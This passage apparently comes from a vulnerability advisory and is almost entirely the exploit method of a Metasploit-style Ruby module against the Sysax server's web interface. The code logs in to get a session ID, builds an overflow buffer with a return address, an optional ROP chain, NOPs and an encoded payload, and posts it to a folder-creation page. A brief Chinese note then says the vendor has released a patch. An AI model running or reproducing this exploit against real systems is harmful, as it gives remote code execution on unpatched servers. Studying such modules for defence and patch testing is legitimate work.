def exploit
user = datastore['SysaxUSER']
pass = datastore['SysaxPASS']
#base64 encode the credentials
encodedcreds = Base64.encode64(user+"\x0a"+pass)
creds = "fd="+encodedcreds
connect
# Login to get SID value
print_status "Getting SID from #{target_url}"
res = send_request_raw({
'method'=> 'POST',
'uri' => "#{target_url}/scgi?sid=0&pid=dologin",
'data' => creds
},20)
#parse response for SID token
sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
print_status "Your " + sid.to_s
buffer = rand_text(target['Offset'])
buffer << [target.ret].pack('V')
if (target['Rop'])
buffer << [target['Nop']].pack('V')*16
buffer << create_rop_chain()
end
buffer << make_nops(15)
buffer << payload.encoded #max 1299 bytes
#pwnag3 post data
post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
post_data << "Content-Length: 171\r\n\r\n"
post_data << "-----------------------------1190753071675116720811342231\r\n"
post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
post_data << buffer+"\r\n"
post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
send_request_raw({
'uri' => "/" + post_data,
'version' => '1.1',
'method' => 'POST',
'referer' => referer
})
handler
disconnect
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
sysax
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: